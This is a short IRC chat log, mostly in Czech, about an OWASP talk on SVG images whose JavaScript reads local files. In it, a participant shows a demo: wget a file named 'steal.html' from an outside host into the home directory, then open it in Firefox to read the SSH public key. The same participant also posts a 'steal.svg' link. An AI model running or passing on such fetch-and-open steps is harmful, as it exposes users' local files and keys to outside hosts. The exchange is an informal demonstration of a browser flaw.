[00:41:37] https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf [00:44:50] "Image is an SVG and executes JavaScript locally" "Attacker can read local files (same directory, sub-folders)" [00:44:54] wtf?! [00:50:38] ano, ve firefoxu to funguje [00:52:27] alespoň v html [00:52:30] cd ~ [00:52:35] wget -q http://jenda.hrach.eu/steal.html [00:52:39] firefox steal.html [00:52:51] (nebojte, čte to *veřejný* ssh klíč) [00:53:43] ale musim si to ulozit do ~/ [00:54:57] jj [00:58:52] http://jenda.hrach.eu/steal.svg [00:59:01] nobody expects… [00:59:28] imho se docela zajímavý věci daj zjistit i z obsahu ~/Downloads/